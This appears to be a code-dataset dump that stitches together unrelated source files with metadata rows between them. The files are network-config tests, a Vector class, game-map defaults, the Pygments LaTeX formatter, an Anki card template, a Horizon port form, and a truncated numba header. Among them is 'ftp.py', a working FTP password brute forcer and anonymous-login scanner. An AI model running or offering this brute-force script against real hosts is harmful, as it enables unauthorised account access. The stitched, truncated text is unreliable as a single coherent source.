def test_nxos_vrf_present(self):
set_module_args(dict(vrf='ntc', state='present', admin_state='up'))
self.execute_module(changed=True, commands=['vrf context ntc', 'no shutdown', 'exit'])
def test_nxos_vrf_present_no_change(self):
set_module_args(dict(vrf='management', state='present', admin_state='up'))
self.execute_module(changed=False, commands=[])
def test_nxos_vrf_absent(self):
set_module_args(dict(vrf='management', state='absent'))
self.execute_module(changed=True, commands=['no vrf context management'])
def test_nxos_vrf_absent_no_change(self):
set_module_args(dict(vrf='ntc', state='absent'))
self.execute_module(changed=False, commands=[])
def test_nxos_vrf_default(self):
set_module_args(dict(vrf='default'))
result = self.execute_module(failed=True)
self.assertEqual(result['msg'], 'cannot use default as name of a VRF')
| gpl-3.0 | 5,271,322,226,520,757,000 | 37.721519 | 94 | 0.668846 | false |
zhuango/python | pythonLearning/oo/vector.py | 2 | 2835 | from array import array
import reprlib
import math
import numbers
import functools
import operator
import itertools
class Vector:
typecode = 'd'
def __init__(self, components):
self._components = array(self.typecode, components)
def __iter__(self):
return iter(self._components)
def __repr__(self):
components = reprlib.repr(self._components)
components = components[components.find('['):-1]
return 'Vector({})'.format(components)
def __str__(self):
return str(tuple(self))
def __bytes__(self):
return (bytes([ord(self.typecode)]) +
bytes(self._components))
def __eq__(self, other):
return (len(self) == len(other) and
all(a == b for a, b in zip(self, other)))
def __hash__(self):
        hashes = (hash(x) for x in self)
return functools.reduce(operator.xor, hashes, 0)
def __abs__(self):
return math.sqrt(sum(x*x for x in self))
def __bool__(self):
return bool(abs(self))
def __len__(self):
return len(self._components)
def __getitem__(self, index):
cls = type(self)
if isinstance(index, slice):
return cls(self._components[index])
elif isinstance(index, numbers.Integral):
return self._components[index]
else:
msg = '{.__name__} indices must be integers'
raise TypeError(msg.format(cls))
shortcut_names = 'xyzt'
def __getattr__(self, name):
cls = type(self)
if len(name) == 1:
            pos = cls.shortcut_names.find(name)
if 0 <= pos < len(self._components):
return self._components[pos]
        msg = '{.__name__!r} object has no attribute {!r}'
raise AttributeError(msg.format(cls, name))
def angle(self, n):
r = math.sqrt(sum(x*x for x in self[n:]))
a = math.atan2(r, self[n-1])
if (n == len(self) - 1) and (self[-1] < 0):
return math.pi * 2 - a
else:
return a
def angles(self):
return (self.angle(n) for n in range(1, len(self)))
def __format__(self, fmt_spec=''):
if fmt_spec.endswith('h'):
fmt_spec = fmt_spec[:-1]
coords = itertools.chain([abs(self)], self.angles())
outer_fmt = '<{}>'
else:
coords = self
outer_fmt = '({})'
components = (format(c, fmt_spec) for c in coords)
return outer_fmt.format(', '.join(components))
@classmethod
def frombytes(cls, octets):
typecode = chr(octets[0])
memv = memoryview(octets[1:]).cast(typecode)
return cls(memv)
print(format(Vector([-1, -1, -1, -1]), 'h'))
print(format(Vector([2, 2, 2, 2]), '.3eh'))
print(format(Vector([0, 1, 0, 0]), '0.5fh'))
| gpl-2.0 | 7,786,916,047,197,369,000 | 30.853933 | 64 | 0.54321 | false |
Zumochi/eve-wspace | evewspace/Map/default_settings.py | 5 | 1540 | # Eve W-Space
# Copyright 2014 Andrew Austin and contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from core.models import ConfigEntry
#defaults = [("TEST_SETTING", "BOB")]
defaults = [
("MAP_PVP_THRESHOLD", "0"),
("MAP_NPC_THRESHOLD", "10"),
("MAP_SCAN_WARNING", "3"),
("MAP_INTEREST_TIME", "15"),
("MAP_ESCALATION_BURN", "3"),
("MAP_ADVANCED_LOGGING", "1"),
("MAP_ZEN_MODE", "0"),
("MAP_PILOT_LIST", "0"),
("MAP_DETAILS_COMBINED", "0"),
("MAP_RENDER_WH_TAGS", "1"),
("MAP_SCALING_FACTOR", "1"),
("MAP_HIGHLIGHT_ACTIVE", "1"),
("MAP_AUTO_REFRESH", "1"),
("MAP_KSPACE_MAPPING", "0"),
("MAP_SILENT_MAPPING", "0"),
("MAP_RENDER_COLLAPSED", "0"),
]
def load_defaults():
'''
Loads default configuration settings.
'''
for setting in defaults:
config = ConfigEntry.objects.get_or_create(name=setting[0],
user=None)[0]
config.value = setting[1]
config.save()
| apache-2.0 | -7,051,287,040,011,681,000 | 33.222222 | 76 | 0.612987 | false |
fusion809/fusion809.github.io-old | vendor/bundle/ruby/2.2.0/gems/pygments.rb-0.6.3/vendor/pygments-main/pygments/formatters/latex.py | 49 | 17273 | # -*- coding: utf-8 -*-
"""
pygments.formatters.latex
~~~~~~~~~~~~~~~~~~~~~~~~~
Formatter for LaTeX fancyvrb output.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import division
from pygments.formatter import Formatter
from pygments.lexer import Lexer
from pygments.token import Token, STANDARD_TYPES
from pygments.util import get_bool_opt, get_int_opt, StringIO, xrange, \
iteritems
__all__ = ['LatexFormatter']
def escape_tex(text, commandprefix):
return text.replace('\\', '\x00'). \
replace('{', '\x01'). \
replace('}', '\x02'). \
replace('\x00', r'\%sZbs{}' % commandprefix). \
replace('\x01', r'\%sZob{}' % commandprefix). \
replace('\x02', r'\%sZcb{}' % commandprefix). \
replace('^', r'\%sZca{}' % commandprefix). \
replace('_', r'\%sZus{}' % commandprefix). \
replace('&', r'\%sZam{}' % commandprefix). \
replace('<', r'\%sZlt{}' % commandprefix). \
replace('>', r'\%sZgt{}' % commandprefix). \
replace('#', r'\%sZsh{}' % commandprefix). \
replace('%', r'\%sZpc{}' % commandprefix). \
replace('$', r'\%sZdl{}' % commandprefix). \
replace('-', r'\%sZhy{}' % commandprefix). \
replace("'", r'\%sZsq{}' % commandprefix). \
replace('"', r'\%sZdq{}' % commandprefix). \
replace('~', r'\%sZti{}' % commandprefix)
DOC_TEMPLATE = r'''
\documentclass{%(docclass)s}
\usepackage{fancyvrb}
\usepackage{color}
\usepackage[%(encoding)s]{inputenc}
%(preamble)s
%(styledefs)s
\begin{document}
\section*{%(title)s}
%(code)s
\end{document}
'''
## Small explanation of the mess below :)
#
# The previous version of the LaTeX formatter just assigned a command to
# each token type defined in the current style. That obviously is
# problematic if the highlighted code is produced for a different style
# than the style commands themselves.
#
# This version works much like the HTML formatter which assigns multiple
# CSS classes to each <span> tag, from the most specific to the least
# specific token type, thus falling back to the parent token type if one
# is not defined. Here, the classes are there too and use the same short
# forms given in token.STANDARD_TYPES.
#
# Highlighted code now only uses one custom command, which by default is
# \PY and selectable by the commandprefix option (and in addition the
# escapes \PYZat, \PYZlb and \PYZrb which haven't been renamed for
# backwards compatibility purposes).
#
# \PY has two arguments: the classes, separated by +, and the text to
# render in that style. The classes are resolved into the respective
# style commands by magic, which serves to ignore unknown classes.
#
# The magic macros are:
# * \PY@it, \PY@bf, etc. are unconditionally wrapped around the text
# to render in \PY@do. Their definition determines the style.
# * \PY@reset resets \PY@it etc. to do nothing.
# * \PY@toks parses the list of classes, using magic inspired by the
# keyval package (but modified to use plusses instead of commas
# because fancyvrb redefines commas inside its environments).
# * \PY@tok processes one class, calling the \PY@tok@classname command
# if it exists.
# * \PY@tok@classname sets the \PY@it etc. to reflect the chosen style
# for its class.
# * \PY resets the style, parses the classnames and then calls \PY@do.
#
# Tip: to read this code, print it out in substituted form using e.g.
# >>> print STYLE_TEMPLATE % {'cp': 'PY'}
STYLE_TEMPLATE = r'''
\makeatletter
\def\%(cp)s@reset{\let\%(cp)s@it=\relax \let\%(cp)s@bf=\relax%%
\let\%(cp)s@ul=\relax \let\%(cp)s@tc=\relax%%
\let\%(cp)s@bc=\relax \let\%(cp)s@ff=\relax}
\def\%(cp)s@tok#1{\csname %(cp)s@tok@#1\endcsname}
\def\%(cp)s@toks#1+{\ifx\relax#1\empty\else%%
\%(cp)s@tok{#1}\expandafter\%(cp)s@toks\fi}
\def\%(cp)s@do#1{\%(cp)s@bc{\%(cp)s@tc{\%(cp)s@ul{%%
\%(cp)s@it{\%(cp)s@bf{\%(cp)s@ff{#1}}}}}}}
\def\%(cp)s#1#2{\%(cp)s@reset\%(cp)s@toks#1+\relax+\%(cp)s@do{#2}}
%(styles)s
\def\%(cp)sZbs{\char`\\}
\def\%(cp)sZus{\char`\_}
\def\%(cp)sZob{\char`\{}
\def\%(cp)sZcb{\char`\}}
\def\%(cp)sZca{\char`\^}
\def\%(cp)sZam{\char`\&}
\def\%(cp)sZlt{\char`\<}
\def\%(cp)sZgt{\char`\>}
\def\%(cp)sZsh{\char`\#}
\def\%(cp)sZpc{\char`\%%}
\def\%(cp)sZdl{\char`\$}
\def\%(cp)sZhy{\char`\-}
\def\%(cp)sZsq{\char`\'}
\def\%(cp)sZdq{\char`\"}
\def\%(cp)sZti{\char`\~}
%% for compatibility with earlier versions
\def\%(cp)sZat{@}
\def\%(cp)sZlb{[}
\def\%(cp)sZrb{]}
\makeatother
'''
def _get_ttype_name(ttype):
fname = STANDARD_TYPES.get(ttype)
if fname:
return fname
aname = ''
while fname is None:
aname = ttype[-1] + aname
ttype = ttype.parent
fname = STANDARD_TYPES.get(ttype)
return fname + aname
class LatexFormatter(Formatter):
r"""
Format tokens as LaTeX code. This needs the `fancyvrb` and `color`
standard packages.
Without the `full` option, code is formatted as one ``Verbatim``
environment, like this:
.. sourcecode:: latex
\begin{Verbatim}[commandchars=\\\{\}]
\PY{k}{def }\PY{n+nf}{foo}(\PY{n}{bar}):
\PY{k}{pass}
\end{Verbatim}
The special command used here (``\PY``) and all the other macros it needs
are output by the `get_style_defs` method.
With the `full` option, a complete LaTeX document is output, including
the command definitions in the preamble.
The `get_style_defs()` method of a `LatexFormatter` returns a string
containing ``\def`` commands defining the macros needed inside the
``Verbatim`` environments.
Additional options accepted:
`style`
The style to use, can be a string or a Style subclass (default:
``'default'``).
`full`
Tells the formatter to output a "full" document, i.e. a complete
self-contained document (default: ``False``).
`title`
If `full` is true, the title that should be used to caption the
document (default: ``''``).
`docclass`
If the `full` option is enabled, this is the document class to use
(default: ``'article'``).
`preamble`
If the `full` option is enabled, this can be further preamble commands,
e.g. ``\usepackage`` (default: ``''``).
`linenos`
If set to ``True``, output line numbers (default: ``False``).
`linenostart`
The line number for the first line (default: ``1``).
`linenostep`
If set to a number n > 1, only every nth line number is printed.
`verboptions`
Additional options given to the Verbatim environment (see the *fancyvrb*
docs for possible values) (default: ``''``).
`commandprefix`
The LaTeX commands used to produce colored output are constructed
using this prefix and some letters (default: ``'PY'``).
.. versionadded:: 0.7
.. versionchanged:: 0.10
The default is now ``'PY'`` instead of ``'C'``.
`texcomments`
        If set to ``True``, enables LaTeX comment lines. That is, LaTeX markup
in comment tokens is not escaped so that LaTeX can render it (default:
``False``).
.. versionadded:: 1.2
`mathescape`
If set to ``True``, enables LaTeX math mode escape in comments. That
is, ``'$...$'`` inside a comment will trigger math mode (default:
``False``).
.. versionadded:: 1.2
`escapeinside`
If set to a string of length 2, enables escaping to LaTeX. Text
delimited by these 2 characters is read as LaTeX code and
typeset accordingly. It has no effect in string literals. It has
no effect in comments if `texcomments` or `mathescape` is
set. (default: ``''``).
.. versionadded:: 2.0
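    A usage sketch (this assumes the top-level `pygments.highlight` helper and
    the stock `PythonLexer`; substitute your own lexer and options)::
        from pygments import highlight
        from pygments.lexers import PythonLexer
        from pygments.formatters import LatexFormatter
        print(highlight('x = 1', PythonLexer(), LatexFormatter(full=True)))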
"""
name = 'LaTeX'
aliases = ['latex', 'tex']
filenames = ['*.tex']
def __init__(self, **options):
Formatter.__init__(self, **options)
self.docclass = options.get('docclass', 'article')
self.preamble = options.get('preamble', '')
self.linenos = get_bool_opt(options, 'linenos', False)
self.linenostart = abs(get_int_opt(options, 'linenostart', 1))
self.linenostep = abs(get_int_opt(options, 'linenostep', 1))
self.verboptions = options.get('verboptions', '')
self.nobackground = get_bool_opt(options, 'nobackground', False)
self.commandprefix = options.get('commandprefix', 'PY')
self.texcomments = get_bool_opt(options, 'texcomments', False)
self.mathescape = get_bool_opt(options, 'mathescape', False)
self.escapeinside = options.get('escapeinside', '')
if len(self.escapeinside) == 2:
self.left = self.escapeinside[0]
self.right = self.escapeinside[1]
else:
self.escapeinside = ''
self._create_stylesheet()
def _create_stylesheet(self):
t2n = self.ttype2name = {Token: ''}
c2d = self.cmd2def = {}
cp = self.commandprefix
def rgbcolor(col):
if col:
return ','.join(['%.2f' %(int(col[i] + col[i + 1], 16) / 255.0)
for i in (0, 2, 4)])
else:
return '1,1,1'
for ttype, ndef in self.style:
name = _get_ttype_name(ttype)
cmndef = ''
if ndef['bold']:
cmndef += r'\let\$$@bf=\textbf'
if ndef['italic']:
cmndef += r'\let\$$@it=\textit'
if ndef['underline']:
cmndef += r'\let\$$@ul=\underline'
if ndef['roman']:
cmndef += r'\let\$$@ff=\textrm'
if ndef['sans']:
cmndef += r'\let\$$@ff=\textsf'
if ndef['mono']:
cmndef += r'\let\$$@ff=\textsf'
if ndef['color']:
cmndef += (r'\def\$$@tc##1{\textcolor[rgb]{%s}{##1}}' %
rgbcolor(ndef['color']))
if ndef['border']:
cmndef += (r'\def\$$@bc##1{\setlength{\fboxsep}{0pt}'
r'\fcolorbox[rgb]{%s}{%s}{\strut ##1}}' %
(rgbcolor(ndef['border']),
rgbcolor(ndef['bgcolor'])))
elif ndef['bgcolor']:
cmndef += (r'\def\$$@bc##1{\setlength{\fboxsep}{0pt}'
r'\colorbox[rgb]{%s}{\strut ##1}}' %
rgbcolor(ndef['bgcolor']))
if cmndef == '':
continue
cmndef = cmndef.replace('$$', cp)
t2n[ttype] = name
c2d[name] = cmndef
def get_style_defs(self, arg=''):
"""
Return the command sequences needed to define the commands
used to format text in the verbatim environment. ``arg`` is ignored.
"""
cp = self.commandprefix
styles = []
for name, definition in iteritems(self.cmd2def):
styles.append(r'\expandafter\def\csname %s@tok@%s\endcsname{%s}' %
(cp, name, definition))
return STYLE_TEMPLATE % {'cp': self.commandprefix,
'styles': '\n'.join(styles)}
def format_unencoded(self, tokensource, outfile):
# TODO: add support for background colors
t2n = self.ttype2name
cp = self.commandprefix
if self.full:
realoutfile = outfile
outfile = StringIO()
outfile.write(u'\\begin{Verbatim}[commandchars=\\\\\\{\\}')
if self.linenos:
start, step = self.linenostart, self.linenostep
outfile.write(u',numbers=left' +
(start and u',firstnumber=%d' % start or u'') +
(step and u',stepnumber=%d' % step or u''))
if self.mathescape or self.texcomments or self.escapeinside:
outfile.write(u',codes={\\catcode`\\$=3\\catcode`\\^=7\\catcode`\\_=8}')
if self.verboptions:
outfile.write(u',' + self.verboptions)
outfile.write(u']\n')
for ttype, value in tokensource:
if ttype in Token.Comment:
if self.texcomments:
# Try to guess comment starting lexeme and escape it ...
start = value[0:1]
for i in xrange(1, len(value)):
if start[0] != value[i]:
break
start += value[i]
value = value[len(start):]
start = escape_tex(start, self.commandprefix)
# ... but do not escape inside comment.
value = start + value
elif self.mathescape:
# Only escape parts not inside a math environment.
parts = value.split('$')
in_math = False
for i, part in enumerate(parts):
if not in_math:
parts[i] = escape_tex(part, self.commandprefix)
in_math = not in_math
value = '$'.join(parts)
elif self.escapeinside:
text = value
value = ''
while len(text) > 0:
a,sep1,text = text.partition(self.left)
if len(sep1) > 0:
b,sep2,text = text.partition(self.right)
if len(sep2) > 0:
value += escape_tex(a, self.commandprefix) + b
else:
value += escape_tex(a + sep1 + b, self.commandprefix)
else:
value = value + escape_tex(a, self.commandprefix)
else:
value = escape_tex(value, self.commandprefix)
elif ttype not in Token.Escape:
value = escape_tex(value, self.commandprefix)
styles = []
while ttype is not Token:
try:
styles.append(t2n[ttype])
except KeyError:
# not in current style
styles.append(_get_ttype_name(ttype))
ttype = ttype.parent
styleval = '+'.join(reversed(styles))
if styleval:
spl = value.split('\n')
for line in spl[:-1]:
if line:
outfile.write("\\%s{%s}{%s}" % (cp, styleval, line))
outfile.write('\n')
if spl[-1]:
outfile.write("\\%s{%s}{%s}" % (cp, styleval, spl[-1]))
else:
outfile.write(value)
outfile.write(u'\\end{Verbatim}\n')
if self.full:
realoutfile.write(DOC_TEMPLATE %
dict(docclass = self.docclass,
preamble = self.preamble,
title = self.title,
encoding = self.encoding or 'latin1',
styledefs = self.get_style_defs(),
code = outfile.getvalue()))
class LatexEmbeddedLexer(Lexer):
r"""
This lexer takes one lexer as argument, the lexer for the language
being formatted, and the left and right delimiters for escaped text.
First everything is scanned using the language lexer to obtain
strings and comments. All other consecutive tokens are merged and
the resulting text is scanned for escaped segments, which are given
the Token.Escape type. Finally text that is not escaped is scanned
again with the language lexer.
"""
def __init__(self, left, right, lang, **options):
self.left = left
self.right = right
self.lang = lang
Lexer.__init__(self, **options)
def get_tokens_unprocessed(self, text):
buf = ''
for i, t, v in self.lang.get_tokens_unprocessed(text):
if t in Token.Comment or t in Token.String:
if buf:
for x in self.get_tokens_aux(idx, buf):
yield x
buf = ''
yield i, t, v
else:
if not buf:
idx = i
buf += v
if buf:
for x in self.get_tokens_aux(idx, buf):
yield x
def get_tokens_aux(self, index, text):
while text:
a, sep1, text = text.partition(self.left)
if a:
for i, t, v in self.lang.get_tokens_unprocessed(a):
yield index + i, t, v
index += len(a)
if sep1:
b, sep2, text = text.partition(self.right)
if sep2:
yield index + len(sep1), Token.Escape, b
index += len(sep1) + len(b) + len(sep2)
else:
yield index, Token.Error, sep1
index += len(sep1)
text = b
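# Illustrative usage sketch (added comment, not part of the original module):
# wrap a language lexer so that text between two "|" delimiters in the source
# is emitted as Token.Escape and later typeset as raw LaTeX by the formatter
# above.  PythonLexer is just an example lexer from pygments.lexers.
#
#   from pygments.lexers import PythonLexer
#   lexer = LatexEmbeddedLexer('|', '|', PythonLexer())
#   tokens = list(lexer.get_tokens_unprocessed('a = |\\alpha| + 1'))
#   # the '\\alpha' part arrives as a single Token.Escape token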
| gpl-3.0 | -1,509,321,526,598,820,400 | 35.751064 | 85 | 0.534997 | false |
Glutanimate/image-occlusion-2-enhanced | src/image_occlusion_enhanced/template.py | 1 | 8175 | # -*- coding: utf-8 -*-
# Image Occlusion Enhanced Add-on for Anki
#
# Copyright (C) 2016-2020 Aristotelis P. <https://glutanimate.com/>
# Copyright (C) 2012-2015 Tiago Barroso <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version, with the additions
# listed at the end of the license file that accompanied this program.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# NOTE: This program is subject to certain additional terms pursuant to
# Section 7 of the GNU Affero General Public License. You should have
# received a copy of these additional terms immediately following the
# terms and conditions of the GNU Affero General Public License that
# accompanied this program.
#
# If not, please request a copy through one of the means of contact
# listed here: <https://glutanimate.com/contact/>.
#
# Any modifications to this file must keep this entire header intact.
"""
Handles the IO note type and card template
"""
from .config import *
# DEFAULT CARD TEMPLATES
iocard_front = """\
{{#%(src_img)s}}
<div id="io-header">{{%(header)s}}</div>
<div id="io-wrapper">
<div id="io-overlay">{{%(que)s}}</div>
<div id="io-original">{{%(src_img)s}}</div>
</div>
<div id="io-footer">{{%(footer)s}}</div>
<script>
// Prevent original image from loading before mask
aFade = 50, qFade = 0;
var mask = document.querySelector('#io-overlay>img');
function loaded() {
var original = document.querySelector('#io-original');
original.style.visibility = "visible";
}
if (mask === null || mask.complete) {
loaded();
} else {
mask.addEventListener('load', loaded);
}
</script>
{{/%(src_img)s}}
""" % \
{'que': IO_FLDS['qm'],
'ans': IO_FLDS['am'],
'svg': IO_FLDS['om'],
'src_img': IO_FLDS['im'],
'header': IO_FLDS['hd'],
'footer': IO_FLDS['ft'],
'remarks': IO_FLDS['rk'],
'sources': IO_FLDS['sc'],
'extraone': IO_FLDS['e1'],
'extratwo': IO_FLDS['e2']}
iocard_back = """\
{{#%(src_img)s}}
<div id="io-header">{{%(header)s}}</div>
<div id="io-wrapper">
<div id="io-overlay">{{%(ans)s}}</div>
<div id="io-original">{{%(src_img)s}}</div>
</div>
{{#%(footer)s}}<div id="io-footer">{{%(footer)s}}</div>{{/%(footer)s}}
<button id="io-revl-btn" onclick="toggle();">Toggle Masks</button>
<div id="io-extra-wrapper">
<div id="io-extra">
{{#%(remarks)s}}
<div class="io-extra-entry">
<div class="io-field-descr">%(remarks)s</div>{{%(remarks)s}}
</div>
{{/%(remarks)s}}
{{#%(sources)s}}
<div class="io-extra-entry">
<div class="io-field-descr">%(sources)s</div>{{%(sources)s}}
</div>
{{/%(sources)s}}
{{#%(extraone)s}}
<div class="io-extra-entry">
<div class="io-field-descr">%(extraone)s</div>{{%(extraone)s}}
</div>
{{/%(extraone)s}}
{{#%(extratwo)s}}
<div class="io-extra-entry">
<div class="io-field-descr">%(extratwo)s</div>{{%(extratwo)s}}
</div>
{{/%(extratwo)s}}
</div>
</div>
<script>
// Toggle answer mask on clicking the image
var toggle = function() {
var amask = document.getElementById('io-overlay');
if (amask.style.display === 'block' || amask.style.display === '')
amask.style.display = 'none';
else
amask.style.display = 'block'
}
// Prevent original image from loading before mask
aFade = 50, qFade = 0;
var mask = document.querySelector('#io-overlay>img');
function loaded() {
var original = document.querySelector('#io-original');
original.style.visibility = "visible";
}
if (mask === null || mask.complete) {
loaded();
} else {
mask.addEventListener('load', loaded);
}
</script>
{{/%(src_img)s}}
""" % \
{'que': IO_FLDS['qm'],
'ans': IO_FLDS['am'],
'svg': IO_FLDS['om'],
'src_img': IO_FLDS['im'],
'header': IO_FLDS['hd'],
'footer': IO_FLDS['ft'],
'remarks': IO_FLDS['rk'],
'sources': IO_FLDS['sc'],
'extraone': IO_FLDS['e1'],
'extratwo': IO_FLDS['e2']}
iocard_css = """\
/* GENERAL CARD STYLE */
.card {
font-family: "Helvetica LT Std", Helvetica, Arial, Sans;
font-size: 150%;
text-align: center;
color: black;
background-color: white;
}
/* OCCLUSION CSS START - don't edit this */
#io-overlay {
position:absolute;
top:0;
width:100%;
z-index:3
}
#io-original {
position:relative;
top:0;
width:100%;
z-index:2;
visibility: hidden;
}
#io-wrapper {
position:relative;
width: 100%;
}
/* OCCLUSION CSS END */
/* OTHER STYLES */
#io-header{
font-size: 1.1em;
margin-bottom: 0.2em;
}
#io-footer{
max-width: 80%;
margin-left: auto;
margin-right: auto;
margin-top: 0.8em;
font-style: italic;
}
#io-extra-wrapper{
/* the wrapper is needed to center the
left-aligned blocks below it */
width: 80%;
margin-left: auto;
margin-right: auto;
margin-top: 0.5em;
}
#io-extra{
text-align:center;
display: inline-block;
}
.io-extra-entry{
margin-top: 0.8em;
font-size: 0.9em;
text-align:left;
}
.io-field-descr{
margin-bottom: 0.2em;
font-weight: bold;
font-size: 1em;
}
#io-revl-btn {
font-size: 0.5em;
}
/* ADJUSTMENTS FOR MOBILE DEVICES */
.mobile .card, .mobile #content {
font-size: 120%;
margin: 0;
}
.mobile #io-extra-wrapper {
width: 95%;
}
.mobile #io-revl-btn {
font-size: 0.8em;
}
"""
# INCREMENTAL UPDATES
html_overlay_onload = """\
<script>
// Prevent original image from loading before mask
aFade = 50, qFade = 0;
var mask = document.querySelector('#io-overlay>img');
function loaded() {
var original = document.querySelector('#io-original');
original.style.visibility = "visible";
}
if (mask.complete) {
loaded();
} else {
mask.addEventListener('load', loaded);
}
</script>\
"""
css_original_hide = """\
/* Anki 2.1 additions */
#io-original {
visibility: hidden;
}\
"""
# List structure:
# (<version addition was introduced in>,
# (<qfmt_addition>, <afmt_addition>, <css_addition>))
# versions need to be ordered by semantic versioning
additions_by_version = [
(
1.30,
(html_overlay_onload, html_overlay_onload, css_original_hide)
),
]
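# Example (added for illustration, not part of the original add-on): a note
# type last saved by a version older than 1.30 gets the 1.30 front/back/CSS
# additions appended exactly once by update_template() below; a note type
# already at 1.30 or newer is left unchanged, because every entry whose
# version is <= old_version is skipped.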
def add_io_model(col):
models = col.models
io_model = models.new(IO_MODEL_NAME)
# Add fields:
for i in IO_FLDS_IDS:
fld = models.newField(IO_FLDS[i])
if i == "note_id":
fld['size'] = 0
models.addField(io_model, fld)
# Add template
template = models.newTemplate(IO_CARD_NAME)
template['qfmt'] = iocard_front
template['afmt'] = iocard_back
io_model['css'] = iocard_css
io_model['sortf'] = 1 # set sortfield to header
models.addTemplate(io_model, template)
models.add(io_model)
return io_model
def reset_template(col):
print("Resetting IO Enhanced card template to defaults")
io_model = col.models.byName(IO_MODEL_NAME)
template = io_model['tmpls'][0]
template['qfmt'] = iocard_front
template['afmt'] = iocard_back
io_model['css'] = iocard_css
col.models.save()
return io_model
def update_template(col, old_version):
print("Updating IO Enhanced card template")
additions = [[], [], []]
for version, components in additions_by_version:
if old_version >= version:
continue
for lst, addition in zip(additions, components):
lst.append(addition)
io_model = col.models.byName(IO_MODEL_NAME)
if not io_model:
return add_io_model(col)
template = io_model['tmpls'][0]
template['qfmt'] += "\n".join(additions[0])
template['afmt'] += "\n".join(additions[1])
io_model['css'] += "\n".join(additions[2])
col.models.save()
return io_model
| bsd-2-clause | 1,233,133,579,582,542,800 | 23.848024 | 74 | 0.627523 | false |
aaronorosen/horizon-congress | openstack_dashboard/dashboards/project/networks/ports/forms.py | 4 | 2591 | # Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard import api
LOG = logging.getLogger(__name__)
class UpdatePort(forms.SelfHandlingForm):
network_id = forms.CharField(widget=forms.HiddenInput())
port_id = forms.CharField(widget=forms.HiddenInput())
name = forms.CharField(max_length=255,
label=_("Name"),
required=False)
admin_state = forms.BooleanField(label=_("Admin State"), required=False)
failure_url = 'horizon:project:networks:detail'
def __init__(self, request, *args, **kwargs):
super(UpdatePort, self).__init__(request, *args, **kwargs)
if api.neutron.is_extension_supported(request, 'mac-learning'):
self.fields['mac_state'] = forms.BooleanField(
label=_("Mac Learning State"), required=False)
def handle(self, request, data):
try:
LOG.debug('params = %s' % data)
extension_kwargs = {}
if 'mac_state' in data:
extension_kwargs['mac_learning_enabled'] = data['mac_state']
port = api.neutron.port_update(request, data['port_id'],
name=data['name'],
admin_state_up=data['admin_state'],
**extension_kwargs)
msg = _('Port %s was successfully updated.') % data['port_id']
LOG.debug(msg)
messages.success(request, msg)
return port
except Exception:
msg = _('Failed to update port %s') % data['port_id']
LOG.info(msg)
redirect = reverse(self.failure_url,
args=[data['network_id']])
exceptions.handle(request, msg, redirect=redirect)
| apache-2.0 | 6,717,944,019,125,245,000 | 39.484375 | 78 | 0.60633 | false |
redknight1138/First | attack/ftp.py | 3 | 2460 | #!./env/bin/python
""" FTP Scanner/Brute Forcer
Use this to either scan a host for anonymous FTP logins or
to try a password list against a host.
Don't be a moron, please don't use this for something illegal.
Usage:
ftp.py brute [-v] <host> <user> <password_file>
ftp.py anon [-v] <host>
ftp.py -h | --help
ftp.py --version
Options:
-v verbose
-h --help Show this screen.
--version Show version
Examples:
./ftp.py anon ftp.debian.org
./ftp.py brute localhost root wordlist/general/big.txt
./ftp.py brute -v localhost root wordlist/general/common.txt
"""
import ftplib
from docopt import docopt
from colorama import Fore, init
def brute_login(hostname, user_name, password_file, verbose=False):
fp = open(password_file, 'r')
for line in fp.readlines():
password = line.strip('\r').strip('\n')
if verbose:
print "[+] Trying: " + user_name + "/" + password
try:
ftp = ftplib.FTP(hostname)
ftp.login(user_name, password)
ftp.quit()
return (user_name, password)
except Exception:
pass
return False
def anon_login(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login('anonymous', '[email protected]')
ftp.quit()
return True
except Exception:
return False
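# Example of calling the helpers directly (illustrative only; the host name and
# wordlist path below are placeholders, not files shipped with this tool):
#
#   if anon_login('ftp.example.com'):
#       print '[*] anonymous login allowed'
#   creds = brute_login('ftp.example.com', 'root', 'wordlist/general/common.txt')
#   if creds:
#       print '[*] found %s:%s' % creds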
def main(arguments):
if arguments['anon']:
        anon = anon_login(arguments['<host>'])
        if anon:
            print Fore.GREEN + '[*] ' + str(arguments['<host>']) + ' FTP Anonymous Logon Succeeded.' + Fore.RESET
        else:
            print Fore.RED + '[-] ' + str(arguments['<host>']) + ' FTP Anonymous Logon Failed.' + Fore.RESET
elif arguments['brute']:
if arguments['-v']:
credentials = brute_login(arguments['<host>'], arguments['<user>'], arguments['<password_file>'], verbose=True)
else:
credentials = brute_login(arguments['<host>'], arguments['<user>'], arguments['<password_file>'])
if credentials:
print Fore.GREEN + '[*] FTP Logon Succeeded: ' + credentials[0] + ":" + credentials[1] + Fore.RESET
else:
print Fore.RED + '[-] No password found for that user on the FTP server.' + Fore.RESET
if __name__ == '__main__':
init()
arguments = docopt(__doc__, version="0.1")
main(arguments)
| mit | 1,171,876,462,818,232,600 | 27.275862 | 123 | 0.569919 | false |
pitrou/numba | numba/funcdesc.py | 2 | 6703 | """
Function descriptors.
"""
from __future__ import print_function, division, absolute_import
from collections import defaultdict
import itertools
import sys
from types import ModuleType
from . import six, types
def transform_arg_name(arg):
